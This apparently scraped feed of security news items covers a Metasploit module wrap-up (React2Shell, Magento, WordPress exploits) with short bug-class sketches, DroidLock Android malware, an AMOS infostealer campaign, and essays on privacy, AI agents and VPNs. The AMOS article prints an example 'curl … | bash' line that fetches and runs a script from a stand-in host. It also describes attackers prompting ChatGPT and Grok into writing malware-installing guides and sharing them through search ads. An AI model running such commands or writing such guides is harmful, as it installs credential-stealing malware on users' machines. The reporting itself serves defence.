Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild
Metasploit Wrap-Up 12/12/2025
React2shell Module
As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as CVE-2025-55182, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with `__proto__`, `constructor`, or `prototype` as module names. We're happy to announce that community contributor vognik submitted an exploit module for React2Shell, which landed earlier this week and is included in this week's release.
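The bug class here is classic JavaScript prototype pollution. As a rough illustration only (this is a generic vulnerable deep-merge, not React's actual Flight deserializer), recursing into a `__proto__` key walks up to `Object.prototype`, letting attacker-controlled JSON attach properties to every object in the process:

```typescript
// Generic prototype-pollution sketch -- NOT React's Flight code.
// A naive deep merge that recurses into attacker-controlled keys.
function unsafeDeepMerge(target: any, source: any): any {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === "object" && source[key] !== null) {
      if (typeof target[key] !== "object" || target[key] === null) {
        target[key] = {};
      }
      // Recursing into "__proto__" lands on Object.prototype itself
      unsafeDeepMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an ordinary own property...
const payload = JSON.parse('{"__proto__": {"polluted": true}}');
unsafeDeepMerge({}, payload);

// ...but the merge walked into Object.prototype, so EVERY object
// now carries the attacker's property:
console.log(({} as any).polluted); // true
```

The standard mitigation for this class is to reject `__proto__`, `constructor`, and `prototype` as keys outright before merging, which is why those three module names are the trigger for this CVE.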
MSSQL Improvements
Over the past couple of weeks, Metasploit has landed two key improvements to the framework’s MSSQL attack capabilities. The first (PR 20637) is a new NTLM relay module, auxiliary/server/relay/smb_to_mssql, which enables users to start a malicious SMB server that relays authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator gets an interactive session to the MSSQL server that can be used to run interactive queries or MSSQL auxiliary modules.
Building on this work, it became clear that users would need to interact with MSSQL servers that require encryption, as many do in hardened environments. To achieve that objective, issue 18745 was closed by updating Metasploit's MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer, and even require, encrypted connections. This functionality is available automatically in the auxiliary/scanner/mssql/mssql_login and new auxiliary/server/relay/smb_to_mssql modules.
New module content (5)
Magento SessionReaper
Authors: Blaklis, Tomais Williamson, and Valentin Lobstein (chocapikk@leakix.net)
Type: Exploit
Pull request: #20725 contributed by Chocapikk
Path: multi/http/magento_sessionreaper
AttackerKB reference: CVE-2025-54236
Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.
Unauthenticated RCE in React and Next.js
Authors: Lachlan Davidson, Maksim Rogov, and maple3142
Type: Exploit
Pull request: #20760 contributed by sfewer-r7
Path: multi/http/react2shell_unauth_rce_cve_2025_55182
AttackerKB reference: CVE-2025-66478
Description: This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.
WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE
Authors: Peter Thaleikis and Valentin Lobstein (chocapikk@leakix.net)
Type: Exploit
Pull request: #20746 contributed by Chocapikk
Path: multi/http/wp_king_addons_privilege_escalation
AttackerKB reference: CVE-2025-8489
Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.
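The underlying bug class is mass assignment: honoring a client-supplied role at registration time. A minimal sketch of the pattern and its fix, in TypeScript rather than the plugin's actual PHP and with invented names:

```typescript
// Hypothetical sketch of the bug class; names are invented and the real
// plugin is PHP. The flaw: the handler honors a role the client sends.
interface RegistrationRequest {
  user_login: string;
  user_role?: string; // attacker-controlled field
}

function vulnerableRegister(req: RegistrationRequest) {
  // Vulnerable: trusts user_role straight from the request body
  return { login: req.user_login, role: req.user_role ?? "subscriber" };
}

function fixedRegister(req: RegistrationRequest) {
  // Fixed: the server decides the role; client input is ignored
  return { login: req.user_login, role: "subscriber" };
}

const attack = { user_login: "mallory", user_role: "administrator" };
console.log(vulnerableRegister(attack).role); // "administrator"
console.log(fixedRegister(attack).role);      // "subscriber"
```

With an administrator account created this way, code execution follows from WordPress's normal plugin-upload capability, which is why the module chains the privilege escalation into RCE.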
Linux Reboot
Author: bcoles (bcoles@gmail.com)
Type: Payload (Single)
Pull request: #20682 contributed by bcoles
Path: linux/loongarch64/reboot
Description: This extends our payloads support to a new architecture, LoongArch64. The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.
Enhanced Modules (2)
Modules which have either been enhanced, or renamed:
- #20736 from sfewer-r7 - This pull request updates the exploit/linux/http/fortinet_fortiweb_rce module (added in https://github.com/rapid7/metasploit-framework/pull/20717) to add support for older FortiWeb versions (6.*), which are no longer supported by the vendor.
- #20747 from vognik - This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.
Enhancements and features (1)
- #20704 from dwelch-r7 - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition, Metasploit Pro.

The Autonomous MSSP: How to Turn XDR Volume into a Competitive Advantage
Turn XDR volume into revenue. Morpheus investigates 100% of alerts and triages 95% in under 2 minutes, letting MSSPs scale without adding headcount.
The post The Autonomous MSSP: How to Turn XDR Volume into a Competitive Advantage appeared first on D3 Security.
The post The Autonomous MSSP: How to Turn XDR Volume into a Competitive Advantage appeared first on Security Boulevard.
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid
I have no context for this video—it’s from Reddit—but one of the commenters adds some context:
Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting.
With so many people carrying around cameras, we’re getting more videos of giant squid at the surface than in previous decades. We’re also starting to notice a pattern, that around this time of year (peaking in January) we see a bunch of giant squid around Japan. We don’t know why this is happening. Maybe they gather around there to mate or something? who knows! but since so many people have cameras, those one-off monster-story encounters are now caught on video, like this one (which, btw, rips. This squid looks so healthy, it’s awesome).
When we see big (giant or colossal) healthy squid like this, it’s often because a fisher caught something else (either another squid or sometimes an antarctic toothfish). The squid is attracted to whatever was caught and they hop on the hook and go along for the ride when the target species is reeled in. There are a few colossal squid sightings similar to this from the southern ocean (but fewer people are down there, so fewer cameras, fewer videos). On the original instagram video, a bunch of people are like “Put it back! Release him!” etc, but he’s just enjoying dinner (obviously as the squid swims away at the end).
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
The post Friday Squid Blogging: Giant Squid Eating a Diamondback Squid appeared first on Security Boulevard.
NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures
Session 5D: Side Channels 1
Authors, Creators & Presenters: Lukas Maar (Graz University of Technology), Jonas Juffinger (Graz University of Technology), Thomas Steinbauer (Graz University of Technology), Daniel Gruss (Graz University of Technology), Stefan Mangard (Graz University of Technology)
PAPER
KernelSnitch: Side Channel-Attacks On Kernel Data Structures
The sharing of hardware elements, such as caches, is known to introduce microarchitectural side-channel leakage. One approach to eliminate this leakage is to not share hardware elements across security domains. However, even under the assumption of leakage-free hardware, it is unclear whether other critical system components, like the operating system, introduce software-caused side-channel leakage. In this paper, we present a novel generic software side-channel attack, KernelSnitch, targeting kernel data structures such as hash tables and trees. These structures are commonly used to store both kernel and user information, e.g., metadata for userspace locks. KernelSnitch exploits that these data structures are variable in size, ranging from an empty state to a theoretically arbitrary amount of elements. Accessing these structures requires a variable amount of time depending on the number of elements, i.e., the occupancy level. This variance constitutes a timing side channel, observable from user space by an unprivileged, isolated attacker. While the timing differences are very low compared to the syscall runtime, we demonstrate and evaluate methods to amplify these timing differences reliably. In three case studies, we show that KernelSnitch allows unprivileged and isolated attackers to leak sensitive information from the kernel and activities in other processes. First, we demonstrate covert channels with transmission rates up to 580 kbit/s. Second, we perform a kernel heap pointer leak in less than 65 s by exploiting the specific indexing that Linux is using in hash tables. Third, we demonstrate a website fingerprinting attack, achieving an F1 score of more than 89 %, showing that activity in other user programs can be observed using KernelSnitch. Finally, we discuss mitigations for our hardware-agnostic attacks.
ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.
Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.
The post NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures appeared first on Security Boulevard.
LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle
Regulators made their move in 2025.
Disclosure deadlines arrived. AI rules took shape. Liability rose up the chain of command. But for security teams on the ground, the distance between policy and practice only grew wider.
Part two of a … (more…)
The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle first appeared on The Last Watchdog.
The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle appeared first on Security Boulevard.
The CISO-COO Partnership: Protecting Operational Excellence
React2Shell Exploits Flood the Internet as Attacks Continue
Vibe Coding: Innovation Demands Vigilance
Microsoft Will Bundle Security Copilot With M365 Enterprise Licenses
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
New Android Malware Locks Device Screens and Demands a Ransom
Android Malware DroidLock Uses ‘Ransomware-like Overlay’
The researchers detailed the new Android malware in a blog post this week, noting that the malware “has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.” The malware uses fake system update screens to trick victims and can stream and remotely control devices via virtual network computing (VNC). The malware can also exploit device administrator privileges to “lock or erase data, capture the victim's image with the front camera, and silence the device.” The infection chain starts with a dropper that appears to require the user to change settings to allow apps to be installed from unknown sources, which leads to the secondary payload that contains the malware. Abusing device administrator privileges, DroidLock is capable of:
- Wiping data from the device, “effectively performing a factory reset.”
- Locking the device.
- Changing the PIN, password or biometric information to prevent user access to the device.
DroidLock Malware Overlays
The DroidLock malware uses Accessibility Services to launch overlays on targeted applications, prompted by an AccessibilityEvent originating from a package on the attacker's target list. The Android malware uses two primary overlay methods:
- A Lock Pattern overlay that displays a pattern-drawing user interface (UI) to capture device unlock patterns.
- A WebView overlay that loads attacker-controlled HTML content stored locally in a database; when an application is opened, the malware queries the database for the specific package name, and if a match is found it launches a full-screen WebView overlay that displays the stored HTML.
What Tech Leaders Need to Know About MCP Authentication in 2025
MCP is transforming AI agent connectivity, but authentication is the critical gap. Learn about Shadow IT risks, enterprise requirements, and solutions.
The post What Tech Leaders Need to Know About MCP Authentication in 2025 appeared first on Security Boulevard.
Microsoft Expands its Bug Bounty Program to Include Third-Party Code
In a nod to the evolving threat landscape that comes with cloud computing and AI and the growing supply chain threats, Microsoft is broadening its bug bounty program to reward researchers who uncover threats to its users that come from third-party code, like commercial and open source software,
The post Microsoft Expands its Bug Bounty Program to Include Third-Party Code appeared first on Security Boulevard.
Funding of Israeli Cybersecurity Soars to Record Levels
Israeli cybersecurity firms raised $4.4B in 2025 as funding rounds jumped 46%. Record seed and Series A activity signals a maturing, globally dominant cyber ecosystem.
The post Funding of Israeli Cybersecurity Soars to Record Levels appeared first on Security Boulevard.
As Capabilities Advance Quickly OpenAI Warns of High Cybersecurity Risk of Future AI Models
OpenAI warns that frontier AI models could escalate cyber threats, including zero-day exploits. Defense-in-depth, monitoring, and AI security by design are now essential.
The post As Capabilities Advance Quickly OpenAI Warns of High Cybersecurity Risk of Future AI Models appeared first on Security Boulevard.
Three New React Vulnerabilities Surface on the Heels of React2Shell
CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779 require immediate attention
The post Three New React Vulnerabilities Surface on the Heels of React2Shell appeared first on Security Boulevard.
Prompt Injection Can’t Be Fully Mitigated, NCSC Says Reduce Impact Instead
The NCSC warns prompt injection is fundamentally different from SQL injection. Organizations must shift from prevention to impact reduction and defense-in-depth for LLM security.
The post Prompt Injection Can’t Be Fully Mitigated, NCSC Says Reduce Impact Instead appeared first on Security Boulevard.
Cyber Risk is Business Risk: Embedding Resilience into Corporate Strategy
To transform cyber risk into economic advantage, leaders must treat cyber as a board-level business risk and rehearse cross-border incidents with partners to build trust.
The post Cyber Risk is Business Risk: Embedding Resilience into Corporate Strategy appeared first on Security Boulevard.
React Fixes Two New RSC Flaws as Security Teams Deal with React2Shell
As they work to fend off the rapidly expanding number of attempts by threat actors to exploit the dangerous React2Shell vulnerability, security teams are learning of two new flaws in React Server Components that could lead to denial-of-service attacks or the exposure of source code.
The post React Fixes Two New RSC Flaws as Security Teams Deal with React2Shell appeared first on Security Boulevard.
Supply Chain Attacks Targeting GitHub Actions Increased in 2025
The US digital doxxing of H-1B applicants is a massive privacy misstep
Technology professionals hoping to come and work in the US face a new privacy concern. Starting December 15, skilled workers on H-1B visas and their families must flip their social media profiles to public before their consular interviews. It’s a deeply risky move from a security and privacy perspective.
According to a missive from the US State Department, immigration officers use all available information to vet newcomers for signs that they pose a threat to national security. That includes an “online presence review.” That review now requires not just H-1B applicants but also H-4 applicants (their dependents who want to move with them to the US) to “adjust the privacy settings on all of their social media profiles to ‘public.'”
An internal State Department cable obtained by CBS had sharper language: it instructs officers to screen for “any indications of hostility toward the citizens, culture, government, institutions, or founding principles of the United States.” What that means is unclear, but if your friends like posting strong political opinions, you should be worried.
This isn’t the first time that the government has forced people to lift the curtain on their private digital lives. The US State Department forced student visa applicants to make their social media profiles public in June this year.
This is a big deal for a lot of people. The H-1B program allows companies to temporarily hire foreign workers in specialty jobs. The US processed around 400,000 visas under the H-1B program last year, most of which were applications to renew employment, according to the Pew Research Center. When you factor in those workers’ dependents, we’re talking well over a million people. This decision forces them into long-term digital exposure that threatens not just them, but the US too.
Why forced public exposure is a security disaster
A lot of these H-1B workers work for defense contractors, chip makers, AI labs, and big tech companies. These are organizations that foreign powers (especially those hostile to the US) care a lot about, and that makes those H-1B employees primary targets for them.
Making H-1B holders’ real names, faces, and daily routines public is a form of digital doxxing. The policy exposes far more personal information than is safe, creating significant new risks.
This information gives these actors a free organizational chart, complete with up-to-date information on who’s likely to be working on chip designs and sensitive software.
It also gives the same people all they need to target people on that chart. They have information on H-1B holders and their dependents, including intelligence about their friends and family, their interests, their regular locations, and even what kinds of technology they use. They become more exposed to risks like SIM swapping and swatting.
This public information also turns employees into organizational attack vectors. Adversaries can use personal and professional data to enhance spear-phishing and business email compromise techniques that cost organizations dearly. Public social media content becomes training data for fraud, serving up audio and video that threat actors can use to create lifelike impersonations of company employees.
Social media profiles also give adversaries an ideal way to approach people. They have a nasty habit of exploiting social media to target assets for recruitment. The head of MI5 warned two years ago that Chinese state actors had approached an estimated 20,000 Britons via LinkedIn to steal industrial or technological secrets.
Armed with a deep, intimate understanding of what makes their targets tick, attackers stand a much better chance of co-opting them. One person might need money because of a gambling problem or a sick relative. Another might be lonely and a perfect target for a romance scam.
Or how about basic extortion? LGBTQ+ individuals from countries where homosexuality is criminalized risk exposure to regimes that could harm them when they return. Family in hostile countries become bargaining chips. In some regions, families of high-value employees could face increased exposure if this information becomes accessible. Foreign nation states are good at exploiting pain points. This policy means that they won’t have to look far for them.
Visa applicants might assume they can simply make an account private again once officials have evaluated them. But states adversarial to the US are actively seeking such information. They have vast online surveillance operations that scrape public social media accounts. As soon as they notice someone showing up in the US with H-1B visa status, they’ll be ready to mine account data that they’ve already scraped.
So what is an H-1B applicant to do? Deleting accounts is a bad idea, because sudden disappearance can trigger suspicion and officers may detect forensic traces. A safer approach is to pause new posting and carefully review older content before making profiles public. Removing or hiding posts that reveal personal routines, locations, or sensitive opinions reduces what can be taken out of context or used for targeting once accounts are exposed.
The irony is that spies are likely using fake social media accounts honed for years to slip under the radar. That means they’ll keep operating in the dark while legitimate H-1B applicants are the ones who become vulnerable. So this policy may unintentionally create the very risks it aims to prevent. And it also normalizes mandatory public exposure as a condition of government interaction.
We’re at a crossroads. Today, visa applicants, their families, and their employers are at risk. The infrastructure exists to expand this approach in the future. Or officials could stop now and rethink, before these risks become more deeply entrenched.
We don’t just report on threats – we help protect your social media
Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.
Are Trade Concerns Trumping US Cybersecurity?
Money Mules Require Banks to Switch from Defense to Offense
EFF and 12 Organizations Urge UK Politicians to Drop Digital ID Scheme Ahead of Parliamentary Petition Debate
The UK Parliament convened earlier this week to debate a petition signed by 2.9 million people calling for an end to the government’s plans to roll out a national digital ID. Ahead of that debate, EFF and 12 other civil society organizations wrote to politicians in the country urging MPs to reject the Labour government’s newly announced digital ID proposal.
The UK’s Prime Minister Keir Starmer pitched the scheme as a way to “cut the faff” in proving people’s identities by creating a virtual ID on personal devices with information like names, date of birth, nationality, photo, and residency status to verify their right to live and work in the country.
But the case for digital identification has not been made.
As we detail in our joint briefing, the proposal follows a troubling global trend: governments introducing expansive digital identity systems that are structurally incompatible with a rights-respecting democracy. The UK’s plan raises six interconnected concerns:
- Mission creep
- Infringements on privacy rights
- Serious security risks
- Reliance on inaccurate and unproven technologies
- Discrimination and exclusion
- The deepening of entrenched power imbalances between the state and the public.
Digital ID schemes don’t simply verify who you are—they redefine who can access services and what those services look like. They become a gatekeeper to essential societal infrastructure, enabling governments and state agencies to close doors as easily as they open them. And they disproportionately harm those already at society’s margins, including people seeking asylum and undocumented communities, who already face heightened surveillance and risk.
Even the strongest recommended safeguards cannot resolve the core problem: a mandatory digital ID scheme that shifts power dramatically away from individuals and toward the state. No one should be coerced—technically or socially—into a digital system in order to participate fully in public life. And at a time when almost 3 million people in the UK have called on politicians to reject this proposal, the government must listen to people and say no to digital ID.
Read our civil society briefing in full here.

New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale
Black Hat Europe 2025: Reputation matters – even in the ransomware economy
Locks, SOCs and a cat in a box: What Schrödinger can teach us about cybersecurity
3 Compliance Processes to Automate in 2026
For years, compliance has been one of the most resource-intensive responsibilities for cybersecurity teams. Despite growing investments in tools, the day-to-day reality of compliance is still dominated by manual, duplicative tasks. Teams chase down screenshots, review spreadsheets, and cross-check logs, often spending weeks gathering information before an assessment or audit.
The post 3 Compliance Processes to Automate in 2026 appeared first on Security Boulevard.
PII in email: Explanation, risks, & protection
Understand what PII is, why email puts it at risk, and how your business can strengthen security to better protect sensitive information.
The post PII in email: Explanation, risks, & protection appeared first on Security Boulevard.
Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer
Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.
Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.
The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.
If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.
As the researchers pointed out:
“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”
This is dangerous for the user on many levels. Because there is no prompt or review, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the attack uses the command line, it can bypass normal file download protections and execute anything the attacker wants.
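The obfuscation layer here is nothing more than base64. A quick sketch (the command and URL below are invented stand-ins, not a real AMOS payload) shows why decoding a string before running it costs nothing and reveals everything:

```typescript
// Illustrative only: the command and URL are made-up stand-ins for what
// an AMOS-style one-liner hides behind base64.
const hiddenCommand = "curl -s https://example.invalid/install.sh | bash";

// What the victim actually sees in the "helpful" Terminal instructions:
const opaque = Buffer.from(hiddenCommand, "utf8").toString("base64");
console.log(opaque); // an unreadable blob -- which is exactly the point

// Decoding it (instead of piping it to a shell) exposes the real action:
const revealed = Buffer.from(opaque, "base64").toString("utf8");
console.log(revealed); // "curl -s https://example.invalid/install.sh | bash"
```

If a guide ever asks you to paste an encoded blob into the Terminal, decode it first; a legitimate instruction has no reason to hide what it does.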
Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.
So how does this work?
The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.
Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.
Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.
How to stay safe
These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.
- First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them. At best, they cost the company you searched for money; at worst, you fall prey to imposters.
- If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
- Use real-time anti-malware protection, preferably one that includes a web protection component.
- Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.
If you’ve scanned your Mac and found the AMOS information stealer:
- Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
- If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
- After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
- Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.
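The persistence check in the first step above can be sketched as a short shell pass over the standard macOS launch-item folders. This is only a review aid, not part of any official removal procedure: it lists candidates and removes nothing, and legitimate software also installs items in these locations.

```shell
# Enumerate launch items in the standard macOS persistence locations
# so you can review them for unfamiliar entries. Listing only; nothing
# is deleted. Verify each .plist before removing it.
list_launch_items() {
    for dir in \
        "$HOME/Library/LaunchAgents" \
        /Library/LaunchAgents \
        /Library/LaunchDaemons; do
        if [ -d "$dir" ]; then
            echo "== $dir =="
            ls -la "$dir"
        fi
    done
    echo "scan complete"
}

list_launch_items
```

Any directory that does not exist is simply skipped, so the same snippet runs cleanly on a freshly reinstalled system.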
If all this sounds too difficult to do yourself, ask a person or company you trust to help you. Our support team is happy to assist if you have any concerns.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Building Trustworthy AI Agents
The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us into doubting what we are or what we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions.
These aren’t edge cases. They’re the result of building AI systems without basic integrity controls. Integrity is the third leg of data security—the old CIA triad. We’re good at availability and working on confidentiality, but we’ve never properly solved integrity. Now AI personalization has exposed the gap by accelerating the harms.
The scope of the problem is large. A good AI assistant will need to be trained on everything we do and will need access to our most intimate personal interactions. This means an intimacy greater than your relationship with your email provider, your social media account, your cloud storage, or your phone. It requires an AI system that is both discreet and trustworthy when provided with that data. The system needs to be accurate and complete, but it also needs to be able to keep data private: to selectively disclose pieces of it when required, and to keep it secret otherwise. No current AI system is even close to meeting this.
To further development along these lines, I and others have proposed separating users’ personal data stores from the AI systems that will use them. It makes sense; the engineering expertise that designs and develops AI systems is completely orthogonal to the security expertise that ensures the confidentiality and integrity of data. And by separating them, advances in security can proceed independently from advances in AI.
What would this sort of personal data store look like? Confidentiality without integrity gives you access to wrong data. Availability without integrity gives you reliable access to corrupted data. Integrity enables the other two to be meaningful. Here are six requirements. They emerge from treating integrity as the organizing principle of security to make AI trustworthy.
First, it would be broadly accessible as a data repository. We each want this data to include personal data about ourselves, as well as transaction data from our interactions. It would include data we create when interacting with others—emails, texts, social media posts—and revealed preference data as inferred by other systems. Some of it would be raw data, and some of it would be processed data: revealed preferences, conclusions inferred by other systems, maybe even raw weights in a personal LLM.
Second, it would be broadly accessible as a source of data. This data would need to be made accessible to different LLM systems. This can’t be tied to a single AI model. Our AI future will include many different models—some of them chosen by us for particular tasks, and some thrust upon us by others. We would want the ability for any of those models to use our data.
Third, it would need to be able to prove the accuracy of data. Imagine one of these systems being used to negotiate a bank loan, or participate in a first-round job interview with an AI recruiter. In these instances, the other party will want both relevant data and some sort of proof that the data are complete and accurate.
Fourth, it would be under the user’s fine-grained control and audit. This is a deeply detailed personal dossier, and the user would need to have the final say in who could access it, what portions they could access, and under what circumstances. Users would need to be able to grant and revoke this access quickly and easily, and be able to go back in time and see who has accessed it.
Fifth, it would be secure. The attacks against this system are numerous. There are the obvious read attacks, where an adversary attempts to learn a person’s data. And there are also write attacks, where adversaries add to or change a user’s data. Defending against both is critical; this all implies a complex and robust authentication system.
Sixth, and finally, it must be easy to use. If we’re envisioning digital personal assistants for everybody, it can’t require specialized security training to use properly.
I’m not the first to suggest something like this. Researchers have proposed a “Human Context Protocol” (https://papers.ssrn.com/sol3/papers.cfm?abstract_id=5403981) that would serve as a neutral interface for personal data of this type. And in my capacity at a company called Inrupt, Inc., I have been working on an extension of Tim Berners-Lee’s Solid protocol for distributed data ownership.
The engineering expertise to build AI systems is orthogonal to the security expertise needed to protect personal data. AI companies optimize for model performance, but data security requires cryptographic verification, access control, and auditable systems. Separating the two makes sense; you can’t ignore one or the other.
Fortunately, decoupling personal data stores from AI systems means security can advance independently from performance (https://ieeexplore.ieee.org/document/10352412). When you own and control your data store with high integrity, AI can’t easily manipulate you because you see what data it’s using and can correct it. It can’t easily gaslight you because you control the authoritative record of your context. And you determine which historical data are relevant or obsolete. Making this all work is a challenge, but it’s the only way we can have trustworthy AI assistants.
This essay was originally published in IEEE Security & Privacy.
NCSC Plugs Gap in Cyber-Deception Guidance
How private is your VPN?
When you’re shopping around for a Virtual Private Network (VPN) you’ll find yourself in a sea of promises like “military-grade encryption!” and “total anonymity!” You can’t scroll two inches without someone waving around these fancy terms.
But not all VPNs can be trusted. Some VPNs genuinely protect your privacy, and some only sound like they do.
With VPN usage rising around the world for streaming, travel, remote work, and basic digital safety, understanding what makes a VPN truly private matters more than ever.
After years of trying VPNs for myself, privacy-minded family members, and a few mission-critical projects, here’s what I wish everyone knew.
Why do you even need a VPN?
If you’re wondering whether a VPN is worth it, you’re not alone. As your privacy-conscious consumer advocate, let me break down three time-saving and cost-saving benefits of using a privacy-first VPN.
Keep your browsing private
Ever feel like someone’s always looking over your shoulder online? Without a VPN, your internet service provider, and sometimes websites or governments, can keep tabs on what you do. A VPN encrypts your traffic and swaps out your real IP address for one of its own, letting you browse, shop, and read without a digital paper trail following you around.
I’ve run into this myself while traveling. There were times when I needed a VPN just to access US or European web apps that were blocked in certain Asian countries. In other cases, I preferred to appear “based” in the US so that English-language apps would load naturally, instead of defaulting to the local language, currency, or content of the country I was visiting.
Watch what you want, but pay less
Some of your favorite shows and websites are locked away simply because of where you live. In many cases, subscription or pay-per-view prices are higher in more prosperous regions. With a VPN, you can connect to servers in other countries and unlock content that isn’t available at home.
For example, when All Elite Wrestling (AEW) announced its major 2022 pay-per-view featuring CM Punk vs. Jon Moxley, US fans paid $49.99 through Bleacher Report. Fans in the UK, meanwhile, watched the exact same event on FiteTV for $23 less, around half the price. Because platforms determine pricing based on your IP address, a VPN server in another region can show you the pricing available in that country. Savings like that can make a VPN pay for itself quickly.
Stay safe on coffee-shop Wi-Fi
Before you join a network named “Starbucks Guest WiFi,” remember that nothing stops a cybercriminal from broadcasting a hotspot with the same name. Public Wi-Fi is convenient, but it’s also one of the easiest places for someone to snoop on your traffic.
Connecting to your VPN immediately encrypts everything you send or receive. That means you can check email, pay bills, or browse privately without worrying about someone nearby intercepting your information. Getting compromised will cost far more in money, time, and stress than most privacy-first VPN subscriptions.
But what actually makes a VPN privacy-first?
For a VPN, “privacy-first” can’t be just a nice slogan. It’s a mindset that shapes every technical, business, and legal decision.
A privacy-first VPN:
- Collects as little data as possible — only the minimum needed to run the service.
- Enforces a real no-logs policy through design, not marketing.
- Builds privacy into everything, from software to server operations.
- Practices transparency, often through open-source components and independent audits.
If a VPN can’t explain how it handles these areas, that’s a red flag.
